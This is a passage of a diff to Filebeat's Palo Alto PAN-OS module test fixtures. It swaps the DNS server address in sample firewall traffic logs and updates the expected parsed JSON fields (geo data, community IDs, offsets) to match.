 542 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,61555,1,34531,443,15855,443,0x400000,tcp,allow,553,479,74,4,2020/03/27 09:57:23,0,any,0,2825833,0x0,192.168.0.0-192.168.255.255,European Union,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 585 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,paloalto-wildfire-cloud,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,61555,1,34531,443,15855,443,0x400000,tcp,allow,553,479,74,4,2020/03/27 09:57:23,0,computer-and-internet-info,0,2825834,0x0,192.168.0.0-192.168.255.255,European Union,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-524 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,57869,1,39926,53,28322,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:21,0,any,0,2825820,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-523 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,6893,1,50703,53,56717,53,0x400000,udp,allow,109,109,0,1,2020/03/27 09:57:21,0,any,0,2825821,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-527 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7565,1,44390,53,39698,53,0x400064,udp,allow,205,75,130,2,2020/03/27 09:56:50,0,any,0,2825811,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+524 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,57869,1,39926,53,28322,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:21,0,any,0,2825820,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+523 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,6893,1,50703,53,56717,53,0x400000,udp,allow,109,109,0,1,2020/03/27 09:57:21,0,any,0,2825821,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+527 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7565,1,44390,53,39698,53,0x400064,udp,allow,205,75,130,2,2020/03/27 09:56:50,0,any,0,2825811,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 521 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.1.3,208.67.222.222,0.0.0.0,208.67.222.222,Internet Access,,,dns,vsys1,Servers,External,ethernet1/2,ethernet1/1,Default,2020/03/27 09:57:19,7419,1,62393,53,18633,53,0x400064,udp,allow,216,92,124,2,2020/03/27 09:56:50,0,any,0,2825813,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 538 <14>1 2020-03-27T09:57:20+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:19,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,58777,1,49729,443,51060,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:20,0,any,0,2825814,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-526 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,6640,1,52595,53,8498,53,0x400064,udp,allow,235,80,155,2,2020/03/27 09:56:50,0,any,0,2825812,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+526 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,6640,1,52595,53,8498,53,0x400064,udp,allow,235,80,155,2,2020/03/27 09:56:50,0,any,0,2825812,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 538 <14>1 2020-03-27T09:57:20+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:19,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7210,1,59651,443,2020,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:21,0,any,0,2825815,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 553 <14>1 2020-03-27T09:57:20+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:19,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,web-browsing,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7210,1,59651,443,2020,443,0x1400000,tcp,allow,4691,1279,3412,12,2020/03/27 09:57:21,0,any,0,2825816,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 575 <14>1 2020-03-27T09:57:20+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:19,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7210,1,59651,443,2020,443,0x1400000,tcp,allow,4691,1279,3412,12,2020/03/27 09:57:21,0,computer-and-internet-info,0,2825817,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
@@ -95,6 +95,6 @@
 546 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:18,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:18,192.168.2.3,208.67.222.222,0.0.0.0,208.67.222.222,Internet Access,,,dnscrypt,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:18,6929,1,54614,443,4663,443,0x400000,udp,allow,904,238,666,2,2020/03/27 09:57:19,0,any,0,2825810,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 535 <14>1 2020-03-27T09:57:16+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:16,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,6325,1,40343,514,32978,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:02,0,any,0,2825797,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 537 <14>1 2020-03-27T09:57:16+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:16,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,7298,1,34636,514,16599,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:02,0,any,0,2825798,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,47300,1,59479,53,5019,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:17,0,any,0,2825802,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,47300,1,59479,53,5019,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:17,0,any,0,2825802,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 533 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,62253,1,40462,514,21854,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:17,0,any,0,2825803,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 580 <14>1 2020-03-27T09:57:16+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:16,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,6765,1,59646,443,10539,443,0x1400070,tcp,allow,7126,1514,5612,22,2020/03/27 09:57:02,0,computer-and-internet-info,0,2825799,0x0,192.168.0.0-192.168.255.255,United States,0,10,12,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log-expected.json
index 6a5b9ba6cc08..6e850fe6d225 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log-expected.json
@@ -211,17 +211,18 @@
         "client.nat.port": 61714,
         "client.packets": 1,
         "client.port": 33101,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -235,7 +236,7 @@
         "event.end": "2020-03-27T09:57:42.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,1615,1,33101,53,61714,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:42,0,any,0,2825925,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,1615,1,33101,53,61714,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:42,0,any,0,2825925,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:42.000+01:00",
         "event.timezone": "+01:00",
@@ -251,8 +252,8 @@
         "network.application": "dns",
         "network.bytes": 98,
         "network.community_id": [
-            "1:iZ9KNh4RcbWK6J5ekLnBGXz74BU=",
-            "1:zaMaHKHgtAI0P0GFKSvTKuRvtCk="
+            "1:Xmeo6Y2DVUkUnYowlIC4n4AWR+0=",
+            "1:seo73slJOc/8O2q/+p1GlQXgmjk="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -269,12 +270,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "1615",
-        "panw.panos.network.nat.community_id": "1:iZ9KNh4RcbWK6J5ekLnBGXz74BU=",
+        "panw.panos.network.nat.community_id": "1:Xmeo6Y2DVUkUnYowlIC4n4AWR+0=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825925,
         "panw.panos.source.interface": "ethernet1/3",
@@ -290,13 +291,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -350,7 +351,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 1545,
+        "log.offset": 1555,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -423,17 +424,18 @@
         "client.nat.port": 65264,
         "client.packets": 1,
         "client.port": 59890,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 129,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -447,7 +449,7 @@
         "event.end": "2020-03-27T09:57:12.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6949,1,59890,53,65264,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:12,0,any,0,2825916,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6949,1,59890,53,65264,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:12,0,any,0,2825916,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:12.000+01:00",
         "event.timezone": "+01:00",
@@ -459,12 +461,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 2046,
+        "log.offset": 2056,
         "network.application": "dns",
         "network.bytes": 226,
         "network.community_id": [
-            "1:4ap7s7Ewlo/ITSyY/EunR84iDq8=",
-            "1:V5wfxRwMjJogpz8WOb9Z2CE+fFA="
+            "1:Kmj5qK2SkQ5pRTNmIE5zY6UkTtg=",
+            "1:Xj2f1cuykp47njJtnIhwkzwPTS0="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -481,12 +483,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "6949",
-        "panw.panos.network.nat.community_id": "1:V5wfxRwMjJogpz8WOb9Z2CE+fFA=",
+        "panw.panos.network.nat.community_id": "1:Xj2f1cuykp47njJtnIhwkzwPTS0=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825916,
         "panw.panos.source.interface": "ethernet1/3",
@@ -502,13 +504,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 129,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -533,17 +535,18 @@
         "client.nat.port": 54688,
         "client.packets": 1,
         "client.port": 34516,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -557,7 +560,7 @@
         "event.end": "2020-03-27T09:57:42.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6776,1,34516,53,54688,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:42,0,any,0,2825923,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6776,1,34516,53,54688,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:42,0,any,0,2825923,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:42.000+01:00",
         "event.timezone": "+01:00",
@@ -569,12 +572,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 2553,
+        "log.offset": 2573,
         "network.application": "dns",
         "network.bytes": 97,
         "network.community_id": [
-            "1:TXdbrHDkJL7c4Toz73rcSBV0T80=",
-            "1:YyWAstwqKQo8JRjHVJZ2iv0huLA="
+            "1:JZThhPVx31q0qgpymCG6PhBdZl8=",
+            "1:iM4w5s97AuwG1BAz2htMwU5KyOI="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -591,12 +594,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "6776",
-        "panw.panos.network.nat.community_id": "1:YyWAstwqKQo8JRjHVJZ2iv0huLA=",
+        "panw.panos.network.nat.community_id": "1:iM4w5s97AuwG1BAz2htMwU5KyOI=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825923,
         "panw.panos.source.interface": "ethernet1/3",
@@ -612,13 +615,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -672,7 +675,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 3054,
+        "log.offset": 3084,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -745,17 +748,18 @@
         "client.nat.port": 47171,
         "client.packets": 1,
         "client.port": 51150,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 130,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -769,7 +773,7 @@
         "event.end": "2020-03-27T09:57:12.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
